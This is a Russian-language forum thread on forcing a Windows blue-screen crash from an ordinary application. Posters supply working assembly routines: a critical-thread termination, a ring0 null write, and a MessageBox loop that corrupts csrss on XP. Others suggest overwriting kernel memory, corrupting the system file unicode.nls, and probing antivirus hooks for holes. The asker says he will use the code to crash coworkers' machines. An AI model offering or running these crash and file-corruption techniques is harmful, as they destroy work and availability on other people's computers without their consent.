нужно сделать BSOD из приложения.

вообщем сабж.
администраторов прошу не удалять данную тему.
создаеться не вредоносная программа, и не вирус,

 

Код (Text):

1. ExitThreadAndInitiateBsod proc
2. Local ThreadInformation:ULONG, OldPrivilege:ULONG
3.     mov ThreadInformation,TRUE
4.     invoke RtlAdjustPrivilege, SE_DEBUG_PRIVILEGE, TRUE, FALSE, addr OldPrivilege
5.     invoke ZwSetInformationThread, NtCurrentThread, ThreadBreakOnTermination, addr ThreadInformation, 4
6.     .if !Eax
7.     invoke ZwTerminateThread, NtCurrentThread, eax
8.     .endif
9.     ret
10. ExitThreadAndInitiateBsod endp

 

Экран вызывает драйвер w2k_kill.sys. А его можно загрузить. Описание есть в книге "Недокументированные возможности Windows 2000" Шрайбера.

или вызвать в ring0:

Код (Text):

1. xor eax,eax
2. xchg [eax],eax

Из статей Four-F.

 

В какой-то малвари видел в цикле вызов MessageBeep. На XP SP2 фокус работал

 

Передай невалидные параметры NtWriteVirtualMemory
бсод даже из юзермода

 

Ммм?

 

Код (Text):

1. .data
2.  
3. MsgCaption      db "\??\Win32 Assembly is Great!",0
4. zero   dw 0
5.  
6. .code
7. start:
8.  
9. .while zero < 10
10.  
11.   invoke MessageBox, NULL,addr MsgCaption, addr MsgCaption,MB_SERVICE_NOTIFICATION
12.   inc zero
13.  .endw
14.  invoke ExitProcess,NULL
15. end start

этот код трет память csrss, в итоге бсод в ХПСП2, в 3 паке вроде пофиксили хотя сам непроверял

 

defaultplayer
Проверил - в SP3 прокручиваются все 10 циклов и бсода нету.

 

Документированно никак нельзя.

Недокументированно - через какую-нибудь багу или через NtSystemDebugControl перезаписать любую критическую память или поменять SYSENTER_EIP_MSR
Само собой, есть ограничения на версию винды.

 

defaultplayer
проверил на XP sp2 под VMware. выводит десять MessageBox'ов, бсод не наблюдается.

 

DarkWanderer

>> нужно сделать BSOD из приложения.

HuXTUS
на эту багу есть патчи помоему..

 

Еще была бага в win32k.sys в функции NtGdiGetDIBits, от которой мало полезного можно добиться кроме бсода. Но сейчас проверил на XP SP3 своей - не пашет

 

Обязательно БСОД или можно просто завесить систему намертво?
Какие ограничения подразумевает будущее решение? Я имею ввиду, учитывается ли наличие хипсов и антивирей на машине?

 

А ведь кодес который выложил Clerk работает, на XP SP2 - бсод

 

Так очень, очень давно пофиксили же. Вроде с этим даже повышать привиллегии можно было.


Magnum

Мммм?

 

blast
то что я предложил на сп2 тоже работает, но выше писали про сп3, поэтому и другие предложения пошли. трудно внимательно читать?

 

Перезаписать или испортить файл C:\windows\system32\unicode.nls и винда помрёт, ни сразу а очень даже медленой смерьтью. В него разрешено писать, но после того как он портится перестают запускатся любые приложения, а после перезагрузки!! Самое интересное! BSOD!!! УРА ТОВАРИСЩИ =)

 

Спасибо всем, помог код клерка!!!
а вот с NtWriteVirtualMemory ничего не получилось(((
2FED, винду убивать мне не надо, мне же ее и востанавливать прийдеться)
Просто на работе много народу смотрит порно...ну а там вирусы и все такое, уже и антавирус не справляеться, вот и решил бороться таким сопособом...

Daos, стоит каспер на каждой машине. больше ничего, винда XP SP2

 

И не получится, если на ней не будет стоять чей-нибудь кривой хук. Кстати, если стоит каспер, можно поискать уязвимости в его хуках - 99% что-то найдется.

А почему именно бсод? Не самый гуманный способ, однако. И не самый надежный в плане совместимости - код, приведенный Клерком, мне давно известен. И так же давно пофиксен. Ты скажи, чего ты конкретно хочешь добиться, возможно найдется более элегантное решение.

 

Есть ключ в реестре прописав туда 1 (не помню точно) по нажатию скрол-лок генериться бсод, можно прописать и keyb_event'ом сделать бсод (возможно ). Можно попортить хип который мапиться из csrss, хотя, по идее, csrss в этот хип не лезет, но, недавно видел багу в графическом тулките codejock (или как я его называю codejerk) с которой этот самый хип портился и в итоге бсод (хотя конечно это не совсем бсод а просто падение csrss и в результате синий экран с надписью system process terminated)